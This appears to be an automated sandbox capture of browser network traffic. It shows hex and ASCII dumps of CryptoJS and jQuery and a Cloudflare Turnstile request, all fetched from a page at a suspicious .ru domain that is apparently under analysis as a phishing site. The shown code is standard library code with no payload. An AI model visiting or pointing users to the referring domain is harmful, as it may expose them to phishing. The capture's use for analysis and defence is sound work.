                            2024-12-18 20:05:32 UTC403INData Raw: 37 62 65 62 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                            Data Ascii: 7beb!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                            2024-12-18 20:05:32 UTC1369INData Raw: 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a
                            Data Ascii: !=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Obj
                            2024-12-18 20:05:32 UTC1369INData Raw: 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64
                            Data Ascii: .clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.rand
                            2024-12-18 20:05:32 UTC1369INData Raw: 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20
                            Data Ascii: ng"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var
                            2024-12-18 20:05:32 UTC1369INData Raw: 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c
                            Data Ascii: (){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<
                            2024-12-18 20:05:32 UTC1369INData Raw: 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c
                            Data Ascii: >0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<
                            2024-12-18 20:05:32 UTC1369INData Raw: 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69
                            Data Ascii: t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stri
                            2024-12-18 20:05:32 UTC1369INData Raw: 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49
                            Data Ascii: r o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHI
                            2024-12-18 20:05:32 UTC1369INData Raw: 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61
                            Data Ascii: *a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}va
                            2024-12-18 20:05:32 UTC1369INData Raw: 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62
                            Data Ascii: 3,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.449746104.18.94.414433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:31 UTC650OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://vcya.warmickmak.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:32 UTC386INHTTP/1.1 302 Found
                            Date: Wed, 18 Dec 2024 20:05:32 GMT
                            Content-Length: 0
                            Connection: close
                            access-control-allow-origin: *
                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                            cross-origin-resource-policy: cross-origin
                            location: /turnstile/v0/b/787bc399e22f/api.js
                            Server: cloudflare
                            CF-RAY: 8f41c4ab99118cd6-EWR
                            alt-svc: h3=":443"; ma=86400


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.449747151.101.2.1374433980C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-12-18 20:05:31 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                            Host: code.jquery.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Referer: https://vcya.warmickmak.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-12-18 20:05:32 UTC613INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 89501
                            Server: nginx
                            Content-Type: application/javascript; charset=utf-8
                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                            ETag: "28feccc0-15d9d"
                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            Via: 1.1 varnish, 1.1 varnish
                            Accept-Ranges: bytes
                            Date: Wed, 18 Dec 2024 20:05:32 GMT
                            Age: 3073863
                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740060-EWR
                            X-Cache: HIT, HIT
                            X-Cache-Hits: 2774, 4
                            X-Timer: S1734552332.094789,VS0,VE0
                            Vary: Accept-Encoding
                            2024-12-18 20:05:32 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                            2024-12-18 20:05:32 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                            Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                            2024-12-18 20:05:32 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                            Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                            2024-12-18 20:05:32 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                            Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                            2024-12-18 20:05:32 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                            Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                            2024-12-18 20:05:32 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                            Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
